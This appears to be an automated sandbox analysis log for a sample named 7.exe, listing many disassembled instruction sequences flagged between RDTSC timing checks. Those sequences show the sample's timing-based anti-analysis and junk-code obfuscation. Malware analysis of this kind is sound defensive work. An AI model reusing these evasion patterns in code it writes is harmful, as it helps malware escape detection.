Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E692F5 second address: E6937C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FDB98EAF3C8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 call 00007FDB98EAF3CAh 0x00000029 mov di, cx 0x0000002c pop edi 0x0000002d push dword ptr fs:[00000000h] 0x00000034 clc 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c clc 0x0000003d mov eax, dword ptr [ebp+122D0379h] 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007FDB98EAF3C8h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 0000001Ah 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d cld 0x0000005e push FFFFFFFFh 0x00000060 mov bx, DEEAh 0x00000064 nop 0x00000065 je 00007FDB98EAF3D8h 0x0000006b push eax 0x0000006c push edx 0x0000006d ja 00007FDB98EAF3C6h 0x00000073 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6B2D1 second address: E6B2DF instructions: 0x00000000 rdtsc 0x00000002 js 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6937C second address: E69380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6B2DF second address: E6B2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E69380 second address: E69395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007FDB98EAF3D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FDB98EAF3C6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6B2E3 second address: E6B2E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6C307 second address: E6C30B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6B42A second address: E6B42E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6B42E second address: E6B434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6B502 second address: E6B506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6B506 second address: E6B50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6E38A second address: E6E38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6F3DF second address: E6F3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDB98EAF3C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6F3EA second address: E6F3F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6F3F0 second address: E6F3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E70256 second address: E7027C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDB98EABA39h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E723D3 second address: E723EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6D629 second address: E6D62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6E553 second address: E6E557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E7046F second address: E70477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6D62D second address: E6D653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FDB98EAF3D9h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6E557 second address: E6E55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6C509 second address: E6C512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6D653 second address: E6D657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6D738 second address: E6D750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E7331E second address: E73322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E73322 second address: E73326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E73326 second address: E733CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDB98EABA30h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FDB98EABA36h 0x00000013 push edi 0x00000014 jnp 00007FDB98EABA26h 0x0000001a pop edi 0x0000001b popad 0x0000001c nop 0x0000001d jmp 00007FDB98EABA39h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007FDB98EABA28h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D3556h], esi 0x00000044 push eax 0x00000045 jmp 00007FDB98EABA35h 0x0000004a pop ebx 0x0000004b push 00000000h 0x0000004d mov edi, dword ptr [ebp+122D2BA1h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 jc 00007FDB98EABA26h 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E71420 second address: E714A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDB98EAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDB98EAF3CAh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FDB98EAF3C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b or edi, 5F585A0Fh 0x00000031 push dword ptr fs:[00000000h] 0x00000038 add dword ptr [ebp+1243CA42h], edx 0x0000003e mov dword ptr [ebp+122D3082h], ebx 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b sub edi, dword ptr [ebp+122D2C71h] 0x00000051 mov bx, si 0x00000054 mov eax, dword ptr [ebp+122D0871h] 0x0000005a mov edi, dword ptr [ebp+122D2D2Dh] 0x00000060 push FFFFFFFFh 0x00000062 mov bh, 0Fh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push edx 0x00000068 jmp 00007FDB98EAF3CFh 0x0000006d pop edx 0x0000006e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E714A4 second address: E714AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDB98EABA26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E75458 second address: E7548C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDB98EAF3D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FDB98EAF3DAh 0x00000012 jmp 00007FDB98EAF3CEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E230BE second address: E230C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E7CE8E second address: E7CECF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDB98EAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDB98EAF3D4h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jnp 00007FDB98EAF3DAh 0x00000017 jmp 00007FDB98EAF3D4h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E80586 second address: E8058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8058C second address: E80590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E80590 second address: E805C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FDB98EABA30h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FDB98EABA32h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E805C7 second address: E805CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E805CB second address: E805D5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E805D5 second address: E805DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E805DB second address: E805F7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jl 00007FDB98EABA26h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E806DC second address: E806E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E806E0 second address: E806E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E806E4 second address: CBEBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 7741B9B1h 0x0000000e stc 0x0000000f cld 0x00000010 push dword ptr [ebp+122D0585h] 0x00000016 cld 0x00000017 call dword ptr [ebp+122D30D1h] 0x0000001d pushad 0x0000001e mov dword ptr [ebp+122D30C7h], ecx 0x00000024 xor eax, eax 0x00000026 clc 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b jl 00007FDB98EAF3C7h 0x00000031 cmc 0x00000032 mov dword ptr [ebp+122D2C75h], eax 0x00000038 stc 0x00000039 mov esi, 0000003Ch 0x0000003e cmc 0x0000003f mov dword ptr [ebp+122D30C7h], ecx 0x00000045 add esi, dword ptr [esp+24h] 0x00000049 jmp 00007FDB98EAF3D0h 0x0000004e lodsw 0x00000050 jne 00007FDB98EAF3CCh 0x00000056 add eax, dword ptr [esp+24h] 0x0000005a jmp 00007FDB98EAF3D1h 0x0000005f mov ebx, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 jns 00007FDB98EAF3CCh 0x0000006a mov dword ptr [ebp+122D27D6h], ebx 0x00000070 popad 0x00000071 nop 0x00000072 jmp 00007FDB98EAF3CDh 0x00000077 push eax 0x00000078 pushad 0x00000079 jc 00007FDB98EAF3CCh 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E81E81 second address: E81E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E81E87 second address: E81E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E81E8D second address: E81EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E81EAB second address: E81EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDB98EAF3D1h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E81EC8 second address: E81ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E891C1 second address: E891C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E891C5 second address: E891C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89717 second address: E89747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDB98EAF3D6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDB98EAF3CFh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89747 second address: E8974B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8974B second address: E89762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDB98EAF3CBh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89762 second address: E89768 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89A28 second address: E89A2E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89A2E second address: E89A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89A39 second address: E89A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EAF3CFh 0x00000009 jg 00007FDB98EAF3C6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89A53 second address: E89A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jo 00007FDB98EABA26h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89A60 second address: E89A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89A66 second address: E89A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89A72 second address: E89A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89BE6 second address: E89BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E89BEC second address: E89BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5A8D3 second address: E5A908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDB98EABA26h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jnp 00007FDB98EABA33h 0x00000013 nop 0x00000014 mov cx, 2CA2h 0x00000018 lea eax, dword ptr [ebp+1246F63Ah] 0x0000001e push eax 0x0000001f push ebx 0x00000020 jc 00007FDB98EABA2Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5A908 second address: E420EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FDB98EAF3C8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 and dh, 0000005Ch 0x00000025 call dword ptr [ebp+122D2EADh] 0x0000002b js 00007FDB98EAF3D2h 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5AD37 second address: E5AD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5AD3B second address: E5AD4D instructions: 0x00000000 rdtsc 0x00000002 js 00007FDB98EAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FDB98EAF3C6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5AEF2 second address: E5AF17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FDB98EABA32h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B1C6 second address: E5B1D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FDB98EAF3C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B1D0 second address: E5B1EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FDB98EABA26h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B37F second address: E5B388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B388 second address: E5B38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B38C second address: E5B3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDB98EAF3CFh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B6DC second address: E5B741 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FDB98EABA34h 0x0000000f nop 0x00000010 mov edi, 040C1F1Ah 0x00000015 push 0000001Eh 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FDB98EABA28h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov ecx, dword ptr [ebp+122D29AAh] 0x00000037 and edi, dword ptr [ebp+122D2CBDh] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jnp 00007FDB98EABA32h 0x00000046 jmp 00007FDB98EABA2Ch 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B741 second address: E5B747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E42C04 second address: E42C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FDB98EABA26h 0x00000009 jmp 00007FDB98EABA2Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8D41E second address: E8D43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 ja 00007FDB98EAF3C6h 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e je 00007FDB98EAF3CEh 0x00000014 push edi 0x00000015 pop edi 0x00000016 jp 00007FDB98EAF3C6h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8D43D second address: E8D446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8D446 second address: E8D467 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDB98EAF3C6h 0x00000008 jmp 00007FDB98EAF3D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8D740 second address: E8D744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8D744 second address: E8D766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007FDB98EAF3D5h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop esi 0x00000012 rdtsc
